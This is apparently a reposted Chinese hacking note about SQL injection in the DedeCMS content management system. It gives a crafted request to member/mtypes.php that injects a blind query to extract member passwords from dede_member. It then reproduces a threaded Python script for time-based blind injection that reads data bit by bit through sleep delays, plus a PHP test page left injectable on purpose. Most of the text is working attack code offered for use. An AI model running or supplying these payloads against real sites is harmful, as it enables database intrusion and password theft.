localhost/data/admin/ver.txt
查看补丁
member/mtypes.php?dopost=save&_FILES[mtypename][name]=.xxxx&_FILES[mtypename][type]=xxxxx&_FILES[mtypename][tmp_name][a' and `'`.``.mtypeid or if(ascii (substr((select pwd from dede_member limit 1),1,1))%3d50,1,0) and mtypeid%3d1%23]=名字&_FILES[mtypename][size]=.xxxx
织梦的默认可以K掉注入。。所以必须要手工试着枚举可能 所有英文字母、、
对照下ascll码表~
如果有跟我一样懒得话 参照lcy影牛写的一个py脚本 php跑延迟注入
#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author: Lcy # @Date: 2015-08-29 22:26:17 # @Last Modified by: Lcy # @Last Modified time: 2015-08-30 01:37:01 # blog:https://phpinfo.me # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): def __init__(self, str,x): threading.Thread.__init__(self) self.str = str self.x = x def run(self): global res x=self.x j = self.str url = "http://localhost/demo/1.php?username=root'+and+if%281=%28mid%28lpad%28bin%28ord%28mid%28%28select%20user()%29," + str(x) + ",1%29%29%29,8,0%29,"+ str(j) + ",1%29%29,sleep%282%29,0%29%23" html = request(url) verify = 'timeout' if verify not in html: res[str(j)] = 0 #print 1 else: res[str(j)] = 1 def request(URL): user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' } req = urllib2.Request(URL, None, user_agent) try: request = urllib2.urlopen(req,timeout=2) except Exception ,e: time.sleep(2) return 'timeout' return request.read() def curl(url): try: start = time.clock() requests.get(url) end = time.clock() return int(end) except requests.RequestException as e: print u"访问出错!" exit() def getLength(): i = 0 while True: print "[+] Checking: %s " %i url = "http://localhost/demo/1.php?username=root'+and+sleep(if(length((select%20user()))="+ str(i) +",1,0))%23" timeout = curl(url) if timeout >= 1: print u"[+] 数据长度为: %s" %i return i i = i + 1 def bin2dec(string_num): return int(string_num, 2) def getData(dataLength): global res data = "" for x in range(dataLength): x = x + 1 #print x threads = [] for j in range(8): result = "" j = j + 1 sb = my_threading(j,x) sb.setDaemon(True) threads.append(sb) #print j for t in threads: t.start() for t in threads: t.join() #print res tmp = "" for i in range(8): tmp = tmp + str(res[str(i+1)]) #print chr(bin2dec(tmp)) res = {} result = chr(bin2dec(tmp)) print result data = data + result sb = None print "[+] ok!" print "[+] result:" + data if __name__ == '__main__': stop = False res = {} length = getLength() getData(length) <?php /* * @Author: Lcy * @Date: 2015-08-29 22:09:59 * @Last Modified by: Lcy * @Last Modified time: 2015-08-30 00:34:31 * 延迟注入测试 */ header("Content-type:text/html;charset=utf8"); $link = mysql_connect("localhost", "root",""); mysql_select_db("mysql", $link); mysql_set_charset("utf8"); $sql = "SELECT user FROM user where user='{$_GET['username']}'"; echo $sql; $query = mysql_query($sql); echo "这是一个没有任何回显的注入点"; ?>
转自:http://www.silic.top/index.php/archives/7/